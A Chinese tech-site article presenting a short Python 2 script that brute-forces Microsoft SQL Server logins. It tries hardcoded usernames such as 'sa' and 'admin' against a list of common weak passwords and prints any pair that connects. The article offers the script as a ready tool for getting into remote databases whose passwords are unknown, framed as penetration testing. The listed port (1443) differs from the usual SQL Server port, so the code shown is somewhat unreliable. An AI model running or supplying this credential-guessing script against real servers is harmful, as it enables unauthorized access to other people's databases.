数据库 
首页 > 数据库 > 浏览文章

Python版Mssql爆破小脚本

(编辑:jimmy 日期: 2024/12/22 浏览:3 次 )

Mssql Python版本爆破小脚本,需要安装 MSSQL-python.exe 可以看出代码量很少,用法:保存代码为MssqlDatabaseBlasting.py,cmd切换到 MssqlDatabaseBlasting.py路径下,并 执行 MssqlDatabaseBlasting.py即可开始破解

import pymssql
common_weak_password = ('','123456','test','root','admin','user')#密码字典
mssql_username = ('sa', 'test', 'admin', 'mssql')#账号字典

success = False
host = "127.0.0.1"#数据库IP地址
port = 1443
for username in mssql_username:
  for password in common_weak_password:
    try:
      db = pymssql.connect(server=host, port=port, user=username, password=password)
      success = True
      if success:
        print username, password
    except Exception, e:
      pass

说明:看到很多网络安全爱好者,在进行渗透测试的时候,遇到数据库可以远程管理,但是无法破解其账号密码,所以此篇文章就推送几个脚本进行渗透。

上一篇:SqlServer 英文单词全字匹配详解及实现代码
下一篇:sql server 编译与重编译详解
一句话新闻
Windows上运行安卓你用过了吗
在去年的5月23日,借助Intel Bridge Technology以及Intel Celadon两项技术的驱动,Intel为PC用户带来了Android On Windows(AOW)平台,并携手国内软件公司腾讯共同推出了腾讯应用宝电脑版,将Windows与安卓两大生态进行了融合,PC的使用体验随即被带入到了一个全新的阶段。